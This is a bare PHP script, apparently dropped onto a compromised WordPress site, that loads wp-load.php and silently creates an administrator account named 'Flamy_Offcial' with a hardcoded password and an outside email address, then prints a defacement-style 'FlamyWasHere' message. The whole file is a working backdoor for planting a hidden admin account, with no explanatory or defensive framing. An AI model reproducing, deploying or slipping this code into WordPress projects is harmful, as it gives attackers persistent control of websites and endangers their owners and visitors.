if(file_exists($_SERVER['DOCUMENT_ROOT'].'/wp-load.php')) {
    require_once($_SERVER['DOCUMENT_ROOT'].'/wp-load.php');
} else {
    die('FAIL');
}
if(!function_exists('wp_create_user')) die('FAIL');
if(!username_exists('Flamy_Offcial') && !email_exists('alertx03a@gmail.com')) {
    $id = wp_create_user('Flamy_Offcial', 'Flamy@Admin', 'alertx03a@gmail.com');
    if(!is_wp_error($id)) {
        (new WP_User($id))->set_role('administrator');
        echo 'FlamyWasHere...!';
        exit;
    }
}
echo 'FAIL';